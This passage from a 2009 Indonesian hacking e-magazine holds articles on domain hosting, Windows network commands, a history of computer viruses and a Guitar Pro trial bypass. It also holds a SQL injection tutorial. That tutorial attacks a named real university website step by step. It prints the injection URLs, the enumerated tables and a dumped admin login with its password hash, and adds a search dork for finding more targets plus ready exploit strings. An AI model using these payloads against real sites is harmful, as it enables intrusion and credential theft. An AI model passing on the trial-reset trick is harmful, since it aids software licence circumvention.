dari hackers-center.org. Contoh lain yang sederhana adalah buku. Dalam buku pasti terdiri dari Bab-
bab nah dalam Bab tersebut pasti terdapat sub bab, n sama kayak domain, forum.hackers-center.org
adalah contoh dari sub domain tersebut.
Untuk membuat sub domain ini biasanya tergantung hosting dan paket yang Loe pilih. Ada paket yang
sudah tersediah bahkan ada pula yang harus memilih paket yang lebih mahal.
Parked Domain
Nah berbedah dengan sub domain. Parked domain ini dapat diartikan menggabungkan beberapa
alamat domain untuk mengakses satu data hosting yang sama. Atau kalau digambarkan diforum yaitu
mempunyai banyak nickname tapi orangnya ya satu itu doank... ☺.
Kayaknya penjelasan gue diatas belum begitu jelas nih.... Ok gue akan gambarkan seperti ini. Loe
mempunyai dua nama domain yaitu situsgue.com dan situsgue2.com. Nah kedua domain ini akan
mengakses data web yang sama. Jadi gini, kalau loe ketik situsgue.com maka akan tampil halaman
- 24- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
situsnya dan kalau loe ketik situsgue2.com juga akan tampil situs yang sama dengan situsgue.com.
Karena kedua domain tersebut mengakses satu data situs.
Sama halnya dengan sub domain. Terkadang untuk mendapatkan fasilitas ini Loe harus membayar
lebih mahal supaya mendapatkan fasilitas parked domain.
Add-on Domain
Pembahasan yang terakhir adalah Add-on Domain. Dimana Add-on Domain ini berbeda dengan
Parked Domain yang telah dibahas sebelumnya.
Perbedaannya adalah kalau Add-on Domain yaitu Loe benar-benar mempunyai dua buah atau lebih
situs dengan dua buah atau lebih alamat domain. Namun masih dalam satu paket hosting yang sama.
Contoh loe mempunyai situs utama dengan alamat warunggue.com. Kemudian loe beli lagi satu
domain namun tidak dengan paket hostingnya. Jadi loe mau meletakkan domain ke dua tadi ke dalam
server hosting situs pertama.
Untuk itu loe dapat menggunakan fasilitas Add-on Domain, dan loe dapat meletakkan isi situs yang
baru ke dalam direktori warunggue.com/situsbaru. Dan pada saat orang mengakses alamat domain
loe yang baru maka yang akan tampil adalah data dari direktori warunggue.com/situsbaru. Namun
pada kotak addressbar browser yang tampil tetap alamat domain yang baru bukan direktori dari
warunggue.com/situsbaru.
Kemudian sama halnya dengan sub domain dan parked domain. Terkadang untuk mendapatkan
fasilitas ini Loe harus membayar lebih mahal supaya mendapatkan fasilitas Add-on Domain.
Ok, gue rasa untuk artikel ini gue cukupin aja dulu..!!! Maaf kalau artikelnya sederhana n kurang jelas.
Serta gue juga minta maaf kepada semua teman-teman karena gue jarang online. Maklum banyak
faktor n penyebab yang tak dapat gue jelaskan satu-persatu. Namun jika teman-teman ada
pertanyaan dapat bertanya langsung ke email gue. (Nobita adalah salahsatu admin HC, Red)
Referensi : Pengalaman pribadi
/Nick : Nobita HC
/Location : Palembang – Sumatera Selatan
/Email : [email protected]
/Web : www.marping.web.id | www.warunggue.com
- 25- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
SQL Injection by Xyberbreaker Membobol Situs Perguruan Tinggi
Writer : Xyberbreaker ([email protected])
Ok, ketemu lagi ama aku, semoga gak bosen ya....
kali ini q bakal nunjukin cara hack salah satu situs perguruan
tinggi di Indonesia
Tool:
1. Mozilla
2. Notepad
3. HexConverter ( download di
http://peretas.freeforums.org/download.php?id=14
password: vires) kalo gk bisa, daftar dulu.. hehe..
Pertama, cari target
Misal: http://www.nwu.ac.id
Kedua, cari bug nya
Misal:http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=1
Ketiga, cek apakah ada kutunya
Jadinya:http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=1'
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
/home/nwuaci/public_html/stikes/mod/publisher/publisher.php on line 213
ok berarti kutunya ada...
Keempat, mulai beraksi... kita pake perintah order
http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+1 <---gak
ada error
http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+2 <---gak
ada error
http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+3 <---gak
ada error
http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+4 <---gak
ada error
http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+5 <---gak
ada error
http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+6 <---gak
ada error
http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+7 <---gak
ada error
- 26- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+8 <---gak
ada error
http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+9 <---gak
ada error
http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+10 <---
gak ada error
http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+11 <---
gak ada error
http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+12 <---
ada error
Ok, kita tau kalo web itu ada 11 kolom
Kelima, kita pake perintah union buat munculin Adwisatya mAgic Number hehe....
http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-
1+union+all+select+1,2,3,4,5,6,7,8,9,10,11--
ok, nomor yang muncul n paling jelas no 4
Keenam, cek versinya pake @@version
http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-
1+union+all+select+1,2,3,@@version,5,6,7,8,9,10,11--
ok, kita liat 5.0.67-community
Mode girang [on]
Ketuju, kita cari tau nama tabel pake group_concat(table_name) from
information_schema.tables+where+table_schema=database()
http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-
1+union+all+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11from
information_schema.tables+where+table_schema=database()—
akbid_authors,akbid_banner,akbid_bannerclient,akbid_bannerfinish,akbid_bukutamu,akbid_counter,
akbid_lblocks,akbid_main_page_content,akbid_menu,akbid_mod_calendar_category,akbid_mod_cal
endar_events,akbid_mod_calendar_location,akbid_mod_calendar_post,akbid_mod_calendar_setting
s,akbid_mod_calendar_subcat,akbid_mod_diskusi,akbid_mod_diskusi_ca
keliatankan??? hm... kayaknya ada yg berharga akbid_authors
Kedelapan, kita cari tahu nama kolom dalam tabel akbid_authors pake group_concat(column_name)
from information_schema.columns+where+table_name=ox(hex nama tabel)
http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-
1+union+all+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11%20from%20information_sche
ma.columns+where+table_name=0x616B6269645F617574686F7273
ok, kelihatan kan??
aid,name,url,email,pwd,counter
- 27- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Kesembilan, kita lihat isi dari kolom diatas...
http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-
1+union+all+select+1,2,3,group_concat(namakolom),5,6,7,8,9,10,11%20from namatable
jadinya :
http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-
1+union+all+select+1,2,3,group_concat(aid,0x3a,name,0x3a,url,0x3a,email,0x3a,pwd,0x3a,counter),5
,6,7,8,9,10,11%20from%20akbid_authors
jelas nih :
admin:Webmaster:http://www.nwu.ac.id:[email protected]:626c0a253fd6a1d13d4358eec31f14b4:
7
admin = username untuk login
Webmaster = status
[email protected] = email admin (kalo mau ngasih tau, tapi udah telat, coz udah q kasih tau)
626c0a253fd6a1d13d4358eec31f14b4 = password dalam md5 crck di
http://thesoftwareengineer.org/services/md5.php
Kesepuluh, login jadi admin
http://www.nwu.ac.id/admin
Kesebelas.... tunjukkan xpresi lo... devil mode [on]
Tambahan:
untuk mencari target: inurl:"mod.php?mod=publisher
Exploit:
-
13%20union%20select%201,2,3,4,5,6,group_concat(aid,0x3a,name,0x3a,email,0x3a,pwd),8,9,10,11%
20from%20authors--
-
13%20union%20select%201,2,group_concat(aid,0x3a,name,0x3a,email,0x3a,pwd),4,5,6,7,8,9,10%20f
rom%20authors--
pilih salah satu, jika masih tidak bisa...
lakukan seperti langkah - langkah diatas..
Thanks: JatimCrew, vires, elfata, Spy_kit33
- 28- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
IP Command Mengenal IP Command pada CMD
Writer : ciebal ([email protected])
MS DOS Promt atau biasa kita kenal dengan CMD
memang terkenal dengan tampilan yang polos tapi masih
banyak digunakan para Hacker di dunia untuk melakukan
aksinya. Kali ini gw coba berbagi sedikit pengatahuan lagi
tentang perintah-perintah yang berhubungan jaringan
yang biasa digunakan para Hacker untuk mengetahui informasi computer/server target dan milik kita
sendiri, berikut perintah-perintahnya (sebelumnya aktifkan CMD) :
ipconfig/all
Berfungsi untuk menampilkan informasi konfigurasi koneksi, seperti Host Name, Primary DNS type,
Ethernet Adapter LAN.
ipconfig/displaydns
Berfungsi untuk menampilkan DNS Cache
ipconfig/flushdns
Berfungsi untuk menghapus DNS Cache
ipconfig/release
Berfungsi untuk menghapus semua koneksi IP address
ipconfig/renew
Berfungsi untuk membuat IP address baru
ipconfig/registerdns
Berfungsi untuk melakukan refresh DNS dan meregister kembali koneksi DNS
ipconfig/showclassid
Berfungsi untuk menampilkan informasi DHCP Class
Ipconfig/setclassid
Berfungsi untuk mengubah DHCP Class ID
control netconections
Berfungsi untuk membuka jendela Network Connection
ping
Berfungsi untuk melakukan test koneksi ke suatu situs atau IP Address tertentu, contoh ping
www.google.com
- 29- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
tracert
Berfungsi untuk menampilkan informasi IP Address route
netstat
Berfungsi untuk menampilkan informasi koneksi TCP/IP yang sedang aktif
route
Berfungsi untuk menampilkan local route
hostname
Berfungsi untuk menampilkan nama computer
Mungkin masih banyak lagi perintah-perintah yang bisa dilakukan, tapi karena pengetahuan gw yang
terbatas jadi lo cari sendiri aja yah. ☺
Gw harap dengan sedikit pengetahuan ini kita bisa tau hal kecil tapi sangat penting untuk diketahui
untuk menjadi ahli security atau hacker. (tapi gw ngomong kayak gini bukan berate gw dah jago yah,
Cuma kebetulan gw pengen nulis tentang hal ini aja).
Referensi : eBook dari www.klik.to, Cuma gw tulis ulang dengan bahasa sendiri. ☺
/Nick : ciebal
/Location : Banten - Bandung
/Email : [email protected] or [email protected]
/Web: www.my-ciebal.co.cc
- 30- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Virus Section Knowledge, History, Type of Virus, etc…
Writer : ramz ([email protected])
Knowledge….
Virus merupakan program yang sengaja dibuat oleh manusia tujuannya untuk merusak
system yang ada pada computer. Program ini memiliki kemampuan untuk mengandakan
diri, merusak system, mengubah konfigurasi system, dan masih banyak lagi. Umunya virus
hanya dapat merusak software tapi tidak menutup kemungkinan hardware akan rusak
apabila suatu computer dipaksa untuk melakukan pekerjaan yang sangat berat.
Umumnya virus yang beredar di dunia IT adalah virus yang menyerang computer berbasis
Windows, tetapi OS yang lainnya belum tentu terbebas dari virus. Berikut adalah data dari
sumber terpercaya (95% Windows, 2% Linux, 1% Mac OS X, 2% FreeBSD)
History …
Virus computer pertama kali digunakan oleh Fred Cohen untuk papernya yang berjudul “Computer Viruses –
Theory and Experiments”. Pada papernya ia menerangkan bahwa sifat dasar virus komputer yaitu: mempunyai
kemampuan untuk menjangkiti (menginfeksi) program lain dan menyebar. Pada dasarnya penggunaan isitlah virus
dikarenakan adanya kesamaan dalam hal sifat antara virus komputer dengan virus yang kita kenal dalam dunia fisik. Di
mana keduanya memiliki dua tujuan yaitu: untuk bertahan hidup dan bereproduksi.
Berikut merupakan perkembangan virus dari tahun 1981 – 2004.
1949, Teori Self-Replicating Program (Program Yang Dapat Menggandakan Diri) Pertama Kali Diperkenalkan.
1981, Virus Komputer Pertamakali Yang Menyerang Sistem Operasi Apple 2 Muncul Dan Menyebar Melalu
Program-Program Game Komputer Bajakan Di Texas.
1983, Fred Cohen Mengimplementasikan Definisi Baku Bagi Virus Komputer.
1986, Virus Boot Sector Pertama Kali Ditemukan, Virus Ini Menyerang PC (Personal Computer) Dengan Nama
Virus Brain Dibuat Oleh Dua Orang Programmer Dari Pakistan Bernama Basit Dan Amjad. Pada Tahun Ini Juga
Diperkenalkan Pertama Kalinya Virus Yang Mampu Menginfeksi File, Diberi Nama Virdem (Virus Demo) Dibuat
Di Jerman.
1987, Virus Yang Mampu Menginfeksi Dua Jenis File .COM Dan .EXE Ditemukan Di Universitas Hebrew Israel.
Virus Ini Bernama Jerusalem Dan Masih Memiliki Kesalahan (Bug) Yang Menyebabkan Virus Menginfeksi Ulang
(Reinfection) File Yang Telah Terinfeksi Sebelumnya. Pada Tahun Ini Pula Virus Stoned Dan Vienna Ditemukan,
Virus Stoned Mampu Menginfeksi MBR (Master Boot Record) Dan Dibuat Oleh Seorang Pelajar Di Universitas
Wellington New Zealand, Sedangkan Virus Vienna Dibuat Oleh Seorang Pelajar Menengah Di Austria.
1989, Kemunculan Virus Dari Bulgaria Bernama Dark Avenger Dibuat Oleh Seseorang Yang Mengaku Dirinya
Dark Avenger. Virus Ini Merupakan Jenis Virus Yang Menyerang Antivirus. Pada Tahun Ini Pula Virus Yang
V
- 31- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Menginfeksi File .EXE Dengan Kemampuan Stealth Ditemukan, Virus Ini Bernama Frodo Dan Akan Melakukan
Perusakan Hardisk Apabila Virus Berjalan Setelah Tanggal 22 September Setiap Tahunnya.
1991, Virus Indonesia Pertamakali Ditemukan, Virus Ini Bernama Den Zuko Dan Terdapat 2 Varian. Virus Ini
Dibuat Oleh Denny Yanuar Ramadhani Dari Bandung Indonesia. Virus Ini Mampu Menghapus (Disinfect) Disk
Yang Telah Terinfeksi Oleh Virus Brain. Hal Ini Menjadi Bukti Adanya Virus Komputer Yang Menyerang Virus
Komputer Lain. Pada Tahun Ini Pula Virus Bernama Tequila Lahir, Virus Ini Memiliki Kemampuan Stealth,
Polymorphic, Multipartition Dan Juga Anti-Antivirus.
1992, Virus Boot Sector Dengan Nama Michelongelo Berhasil Menginfeksi Lebih Dari 5 Juta Komputer Di
Seluruh Dunia. Pada Tahun Ini Pula VCL (Virus Creation Laboratory) Pertama Kali Tercipta,.VCL Merupakan Tool
Kit Yang Dapat Untuk Membuat Virus Komputer Secara Instan, Artinya Virus Bisa Dibuat Oleh Siapa Saja Tanpa
Membutuhkan Pengetahuan Pemrograman Dari Pembuatnya.
1994, Virus Dengan Nama Pathogen Muncul Di Inggris. Virus Ini Memiliki Kemampuan Polymorphic, Dibuat
Oleh Seorang Yang Mengaku Bernama Black Baron, Sang Pembuat Berhasil Tertangkap Dan Dipenjara.
1995, Virus Makro Tercipta Yang Pada Waktu Itu Mulai Menginfeksi Dokumen Jenis Microsoft Word.
1996, Virus Makro Yang Menginfeksi File-File Office Word Dan Excel Tercipta.
1997, Terdapat Kurang Lebih 12000 Virus Baru Tercipta Dan Tersebar Di Seluruh Dunia.
1998, Virus Benama Strangebrew Membuktikan Akan Virus Yang Mampu Menginfeksi File Java. Java Sendiri
Merupakan Platform Yang Pernah Di Bangga-Banggakan Akan Predikat “Bebas Virus”-Nya. Pada Tahun Ini Pula
Dua Anak Umur Belasan Dari California Berhasil Membobol Dan Mengendalikan Sekitar Lebih Dari 500 Sistem
Komputer Pemerintahan Dan Militer Di Amerika.
1999, Virus Makro Dengan Nama W97M/Melissa Hadir. Virus Ini Mampu Menyebarkan Dirinya Melalui Pesan
Elektronik (E-Mail) Dan Berhasil Menginfeksi Kurang Lebih 1 Juta Komputer Di Seluruh Dunia. Di Lain Tempat
Virus CIH Menyebar Cukup Pesat Di Korea Dan Menyebabkan Kerugian Finansial Kurang Lebih US $ 250 Juta,
Virus CIH Sendiri Merupakan Virus Yang Memiliki Kemampuan Untuk Merusak Hardware Dengan Cara
Mengoverwrite BIOS.
2000, Virus ILOVEYOU (Love Bug) Yang Mirip Dengan Virus Melissa Menyebar Lewat Email Dan Memilik Aksi
Menghapus Beberapa File Multimedia Seperti .MP3, .MP2 Dll. Virus Ini Memiliki Kemampuan Untuk Mencuri
Informasi Berharga Korban Yang Terinfeksi Dan Mengirimkan Kepada Pembuatnya.
2001, Worm Dengan Nama Codered Berhasil Menginfeksi Lebih Dari 300.000 Komputer Di Seluruh Dunia Dan
Mengakibatkan Kerugain Sebesar Kurang Lebih US $ 2.5 Milyar.
2002, Pembuat Virus W97M/Melissa Tertangkap Oleh Pihak Federal Dan Dikurung Selama 20 Bulan. Pada
Tahun Ini Pula Muncul Worm Bugbear Yang Memiliki Beraneka Macam Tehnik Infeksi Dengan Beberapa
Metode Yang Kompleks Dan Juga Kelahiran Worm Nimda (Merupakan Aksara Terbalik Dari Kata “Admin”) Dan
Klez.
- 32- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
2003, Merupakan Tahun Kejayaan Worm. Worm Dengan Nama Slammer Tercipta Dan Berhasil Menginfeksi
Tidak Kurang Dari 75.000 Komputer Di Seluruh Dunia Dalam Waktu 10 Menit Setelah Tercipta. Worm Ini
Memiliki Kecepatan Reproduksi Dan Penyebaran Tercepat Yaitu 8.5 Detik/Worm. Pada Tahun Ini Pula Worm
Sobig Lahir Dan Merupakan Worm Yang Mampu Melakukan Aktifitas Spam Besar-Besaran, Setiap E-Mail Yang
Dikirimkan Akan Memiliki Nama Pengirim
<!– Var Prefix = ‘Ma’ + ‘Il’ + ‘To’; Var Path = ‘Hr’ + ‘Ef’ + ‘=’; Var Addy15158 = ‘Big’ + ‘@’; Addy15158 =
Addy15158 + ‘Boss’ + ‘.’ + ‘Com’; Document.Write( ” ); Document.Write( Addy15158 ); Document.Write( ” ); //–
>\N [email protected] <!– Document.Write( ‘‘ ); //–>
Email telah dilindungi dari Spam Bots, Anda harus mengaktifkan Java untuk dapat melihatnya <!–
document.write( ” ); //–> , Worm Yang Memiliki Pangkat MM (Mass Mailer) Ini Telah Mengakibatkan Kerugian
Ekonomi Sebesar US $ 29.7 Miliar. Belum Lagi Selesai Terror Worm Sobig, Muncul Lagi Worm Blaster Yang
Menyerang Servis RPC (Remote Procedure Call) Pada Sistem Operasi Windows, Worm Yang Pernah Membuat
Pihak Microsoft Kalang Kabut Ini Memiliki Kecepatan Penyebaran 4000 Infeksi/Jam.
2004, Worm Dengan Nama Mydoom Merajai Pervirusan Dunia Dengan Tingkat Infeksi Yang Tinggi Dan
Menguasai 30% Bandwidth Yang Digunakan Internauts (Pengguna Internet) Di Seluruh Dunia. Worm Yang
Menyandang Rating High Risk Dari Beberapa Vendor Antivirus Ini Memiliki Daya Hancur Yang Lebih Hebat Dari
Worm Sobig Dan Welchia, Selain Itu Worm Ini Juga Melakukan Serangan Ddos (Distributed Denial Of Service)
Ke Situs Www.Sco.Com Dan Www.Microsoft.Com Dan Juga Memblok Beberapa Situs Antivirus
Kriteria Virus …
Menurut y3dips [salam kaka ☺ ].
Ada 5 kriteria, dan apabila semua melengkapi barulah program tersebut dapat dikatakan virus . Kriteria tersebut adalah :
1. Kemampuan untuk mendapatkan informasi.
Informasi dalam hal ini adalah informasi tentang keadaan computer tersebut ( program apa yang rentan di
serang, bagaimana system keamanannya ).
2. Kemampuan memeriksa suatu program.
Dalam penularan / penyerangan virus tersebut harus tau apakah file dengan ekstensi ini sudah siap untuk
diserang/tulari, belum siap untuk diserang/tulari, atau bahkan sudah diserang/tulari ?
3. Kemampuan menggandakan diri.
Bukan virus namanya kalo gak bisa menggandakan diri. Hal ini merupakan hal terpenting dalam criteria virus.
Biasanya cara tersebut adalah :
a. Menulari file / program setelah itu menghapus / merename file aslinya.
b. Menumpangi seluruh file / program yang ada apabila virus tersebut sudah di load.
4. Kemampuan untuk manipulasi.
Umumnya virus pada OS Windows memanipulasi registry, dan melakukan perubahan setting. Hal ini sudah dapat
menjelaskan kemampuan untuk manipulasi.
5. Kemampuan untuk menyembunyikan diri / kamuflase.
Kamuflase / penyembunyian juga merupakan hal yang terpenting, apalagi jika kita berbicara soal Anti Virus,
namun memang hal ini yang digunakan untuk mengelabui antivirus.
- 33- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
JENIS – JENIS VIRUS
Jenis – jenis virus yang sering beredar di dunia computer adalah sebagai betikut :
• Virus Boot Sector :
Virus ini sudah langka, namun sangatlah berbahaya. Karena virus ini menginfeksi boot sector, yang
merupakan sesuatu yang dibaca pertama kali oleh system operasi pada saat computer sedang diakses.
Sehingga pada saat booting virus menetap di memory dan dapat langsung melaksanakan aksinya pada
penyerangan ke media penyimpanan yang lain [disket, flashdisk, dll] yang terhubung ke computer tersebut.
• Virus File :
Jenis virus ini adalah jenis yang virus yang paling banyak kita jumpai. Jenis file untuk virus ini adalah jenis file
dengan type execution [.exe / .bat / .vbs / .com]. Tingkat bahaya dari virus ini tergantung ke kreatifan
programmer dalam membuat virusnya, sehingga tidak dapat di tentukan tingkat bahaya virus ini. Biasanya
virus ini melakukan perintah – perintah penghapusan data, penggantian value pada suatu data sehingga
bersifat fatal, penyerangan terhadap registry, dan lain – lain.
• Virus Macro :
Virus ini terbentuk ketika windows memberikan fitur baru yang memudahkan penggunanya tetapi
disalahgunakan sehingga terbentuklah lagi virus baru yakni “virus makro”. Okey, kita cari kembali arti dari
makro adalah perintah yang mirip dalam bahasa pemrograman yang disediakan oleh perangkat lunak untuk
melakukan suatu pekerjaan tertentu.
• Multi Partition Virus
Virus program dan virus boot yang ganas, dengan cara kerja menginfeksi suatu program kemudian setelah
terinfeksi virus tersebut dijalankan yang menyebabkan penyerangan virus terhadap boot sector. Pendeknya
virus ini adalah gabungan dari Virus File dan Virus Boot Sector.
• Stealth Virus
Banyak pendapat tentang virus ini ada yang berpendapat demikian “mengalihkan Virus ini akan
menguasai tabel tabel interupt pada DOS yang sering kita kenal dengan "Interrupt interceptor".
virus ini berkemampuan untuk mengendalikan instruksi instruksi level DOS dan biasanya mereka
tersembunyi sesuai namanya baik secara penuh ataupun ukurannya .”
Kesimpulannya adalah Stealth Virus menggunakan banyak cara untuk mengamankan dirinya agar
tidak terdeteksi oleh antivirus / pengguna computer.
• Polymorphic Virus :
Jenis virus ini cukup brilliant, dengan cara mengenkripsi dirinya, dengan cara tersebut virus
tersebut dapat lolos dari pendeteksian antivirus.
- 34- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
MEDIA PENYEBARAN VIRUS
Eitss...
Virus ga tiba – tiba nongol di PC kita loh, kecuali kita yang buat ☺ Tapi suatu virus memanfaatkan
media untuk melakukan aksinya. Disini akan dibahas sedikit tentang media yang digunakan untuk menyebarkan
virus.
• Media external :
Media external adalah media yang paling sering digunakan oleh pengguna computer. Terutama media
yang bersifat R / W atau Read Write. [ Flashdisk, Disket, CD RW, Hardisk External, MMC, dll]
• Media Jaringan :
Media jaringan merupakan media yang memungkinkan terjadinya pertukaran data antara penggunanya.
Dengan pertukaran data itulah letak kemudahan virus untuk menyebarkan dirinya.
[ LAN. WAN. MAN ]
• Media Online :
Banyak media online yang dapat di inject malcode, salah satunya adalah WWW. Mungkin celah eksekusi
VBScript pada Internet Explorer sudah di tutup, tapi masih ada kemungkinan seiring perkembangan IT.
• Media Attachment / Download File:
Melalui attachment atau download file tidak menutup kemungkinan file yang anda download adalah
sebuah virus / aplikasi jelmaan virus. Sehingga dalam mendownload suatu file [terutama program] harus
jelas asal – usul file tersebut.
PENCEGAHAN VIRUS :
Satu hal yang harus diingat
“Virus ada karena media”
Nah, media tersebutlah yang harus kita antisipasi agar tidak terjangkiti virus. Okey sekarang ada beberapa cara
untuk mengantisipasi hal tersebut Biasanya. Biasanya loh ya….
Virus menyebar melalui media dengan cara :
1. File autorun.inf
File ini adalah loader yang di letakkan di setiap root pada suatu drive.
Antisipasi :
� Buatlah folder autorun.inf di setiap root drive pada media yang anda gunakan.
� Alternatif lain. Masuklah ke CMD lalu ketikkan
assoc .inf=textfile
2. File desktop.ini
Sama halnya dengan autorun.inf tetapi bedanya adalah biasanya file desktop.ini berkoordinasi
dengan file folder.htt.
Antisipasi :
� Buatlah folder desktop.ini di setiap root drive pada media yang anda gunakan.
� Alternatif lain. Masuklah ke CMD lalu ketikkan
- 35- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
assoc .ini=textfile
assoc .htt=textfile
Ending.
Bacaan ini adalah bacaan ringan yang hanya dikhususkan bagi newbie, mohon maaf apabila ada kesalahan dan kesan “sok
menggurui” dalam bacaan ini.
Writer : ramz
Support : GOD | HC STAFF | ALL OF MY FRIEND
Source : Virus article made by : y3dips
Filez Magazine
- 36- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Guitar Pro 5.2 Demo Version Ternyata Ada Pintu Yang Lupa di Tutup...
Writer : EiGhtTailz ([email protected])
A Little Word……
Hhuft… akhirnya bisa juga nulis artikel buat HC eMagazine… Moga-moga aja tulisan gw ini bisa
nampang di edisi Perdana (Ngarep mode = On) ☺. Niatnya sih gw mw masukin artikel ttg Cracking, Hacking n
lainnya, but coz waktunya udah mepet, gw takut aja g bisa nyumbang buat edisi 1, kan sebagai member aktif
HC gw g boleh ketinggalan donk!!, kontribusi gw mana?? (deuh,, gaya lo udah kyk Contributor ae…), Member
yg laen juga g boleh ketinggalan yah…..
Keep Share n Learn…..
Sekilas tentang Guitar Pro…
Dari namanya aja kalian udah pada tau donk software buat apa?? Yupz bener bgt!! Guitar Pro adalah
software yg dipergunakan untuk membaca tabulasi gitar dalam file yg berformat .midi , membuat tabulasi gitar
sendiri juga bisa, n masih banyak lagi hal yg bisa dilakukan….
Gw dapet software ini dari temen gw yg pada doyan maen band n doyan Gigitaran (bahasa apaaaan
tuh?? Aneh), Akhirnya gw minta aja nih software n langsung ditaro di FD gw,, setelah gw install di
rumah….OMD ( Oh…My Dog!!) ternyata Cuma trial version….anjrit gw di kibulin #!%$*@ ….katanya software
bagus masa trial version….cape deh….Langsung aja gw kirim Semeses (SMS) ke temen gw yg ngasih software (
si Billie Jay).
E.T : “ Eh bro….Serial Numbernye mane?? Kok Cuma trial c? ah lo tega banget ngibulin gw”.
B.J : “ Oiya Sorry Bos ….Aim Proget Coy!! Ntu Cuma demo Version, lo Registerin deh sekalian,, kan lo jago
computer tuh ( Narsis mode = On ), or lo crackingin kek….ntar kalo udah bisa kasih gw
yah………Wkekeke…
E.T : “ Asem bener dah…..nyusahin ae lo curut!! Ntar gw usahain deh….tapi keknya butuh proses lama……n ntu
juja kalo bisa….makanya ntar malem lo solat tahajud, doain gw supaya bisa ngadalin nih
software…hehe”.
B.J : “ Lah……doain emak gw aja jarang…..ngapain juga doain lo……cape deh!!”
.......:::......End of Story.......:::........
- 37- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Let`s the Show Begin....
Gw ambil FD gw trus gw colok deh di kompie gw.....buka file setup....Install dah ......
Setelah proses install yg tidak banyak memakan waktu..... tapi ngebetein....... sampailah kita didalam program
Guitar Pro......
Kalo menurut gw keren lah tampilan nya....
Kombinasi Pink yg cantik....But,,
Nah loh......
Bener kan kata gw??? Cuma trial...........asem bener dah...............
Liat neh...........
- 38- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Cuma dikasih 15 hari coy......pelit banget dah tuh programmer......coba dikasih 15 tahun.....wkekeke...... ; P
Akhirnya gw coba klik tuh tombol Order!
N ini yg kluar.....
Wadoh...... kayaknya kalo mau registrasi harus bwa kompie gw ke warnet,, cape deh....udah gitu
disuruh bayar lagi.....ogah beud.....Terbersit di otak gw buat cracking nih software.....Gw otak-atik semaleman
pake ollydbg... g ketemu2.....mpe akhirnya gw pusing sendiri, entah databasenya di encrypt or emang gw nya
aja katro.....maklum lah baru belajar cracking disuruh crack software yg versi 5, jelas udah banyak yg di
patch.....nyerah gw dah........ Mpe akhirnya beberapa hari setelah musibah itu (gagal crack), gw mampir ke hoz
temen gw lagi, abis bete di hum liat kompie mulu, mo maen cewe but g punya ( ngiri gw ma yg punya pacar),
gw curhat aja ma temen gw....
- 39- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
E.T : “ Jay, gw gagal neh....Bingung gw....algoritmanya g ketemu2.....mungkin nti kalo gw udah jago....nyerah
gw......”
B.J : “ Ah payah lo ah....katanya jago!! “ ( Sedih bgt gw digituin..... )
E.T : “ Sini gw pinjem kompie lo...”
Akhirnya gw megang kompie dy...gw buka lagi tuh software sialan ( Guitar Pro, abis gw kesel ),, eh punya dy
udah kadaluarsa alias end of trial version....
Biz ntu gw lepas tuh kompie n gw tiduran di kasur dy...( hayah,, jgn mikir mesum ya....) gw mikir2 “ How should
I do ??? “,, masih terus berpikir n gw baru inget kalo ngebuka or ngejalanin file tuh bisa dilakukan dengan
beberapa cara, n gw juga pernah baca disebuah artikel tentang pintu yg lupa ditutup oleh programmernya ,
jalan pertama yg gw coba adalah klik kanan pada GP lalu Run as,
Kita lihat apa yang terjadi,, n benar saja, Guitar Pro kembali lagi pada saat awal trial version....
Aneh kan?? Padahal sudah jelas sebelumnya,, end of trial version...
Ini nyata....ternyata pintu Run as lupa ditutup oleh sang programmer, haduh parah juga ya.....ternyata dengan
trik simple software ini bisa di “kadalin”, cape juga gw kalo gini caranya, udah susah2...hhuft....
